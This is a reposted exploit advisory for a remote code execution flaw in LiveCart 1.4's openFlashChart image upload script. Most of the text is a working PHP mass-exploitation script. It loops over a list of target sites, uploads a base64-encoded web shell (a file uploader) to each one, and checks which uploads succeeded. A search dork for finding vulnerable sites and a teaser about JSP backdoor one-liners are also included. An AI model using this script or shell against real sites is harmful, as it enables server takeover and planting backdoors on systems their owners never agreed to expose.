#Title : LiveCart 1.4 Remote Code Execution #Author : DevilScreaM #Date : 10/23/2013 #Category : Web Applications #Type : PHP #Vendor : http://livecart.com #Download : http://livecart.com/download #Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber #Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded | #Vulnerabillity : Remote Code Execution #Dork : intext:Powered by LiveCart & USE YOUR BRAIN Vuln : http://site-target/library/openFlashChart/ofc_upload_image.php Refference : https://github.com/integry/livecart/blob/master/library/openFlashChart/ofc_upload_image.php Exploit and Script @set_time_limit(0); $site = explode("rn", $_POST['target']); $filename = $_POST['name']; $path = array('/library/openFlashChart/ofc_upload_image.php'); $result = array("/library/tmp-upload-images/"); $shell = base64_decode("PD9waHANCmVjaG8gJzx0aXRsZT5VcGxvYWQgRmlsZXMgSW5kb25lc2lhbiBEZWZhY2VyIHwgaW5hLnBocDwvdGl0bGU+JzsNCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7DQplY2hvICc8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0iNTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIGlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsNCglpZihAY29weSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkgeyBlY2hvICc8Yj5VcGxvYWQgQmVyaGFzaWwgISEhPC9iPjxicj48YnI+JzsgfQ0KCWVsc2UgeyBlY2hvICc8Yj5VcGxvYWQgR2FnYWwgISEhPC9iPjxicj48YnI+JzsgfQ0KfQ0KPz4="); $options = array('http' => array('method'=> "POST",'header'=> "Content-type: text/plainrn", 'content'=> $shell)); $context = stream_context_create($options); if($_POST['hajar']) { foreach($site as $target) { foreach($path as $upload) { $fopen = @fopen("{$target}{$upload}?name={$filename}", 'r', false, $context); } foreach($result as $results) { $url = "{$target}{$results}{$filename}"; $check = @file_get_contents($url); if(eregi("0day-id.php.php", $check)) { echo "[+] Sh3ll Uploaded => {$target}/{$results}/{$filename}
"; flush(); } } } } ?>0day-id.com | LiveCart Remote Code Execution
文章来源于lcx.cc:LiveCart 1.4 Remote Code Execution
相关推荐: jsp能像php asp什么的include后门文件吗?
jsp能像php asp什么的include后门文件吗? 不可以吧,jsp只能include jsp文件吧?要不怎么没看见有人说过jsp include后门呢? 真的可以吗?为什么可以?如果 index.jsp包含1.jpg: 1.jpg内容是我们的菜刀一句话…
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论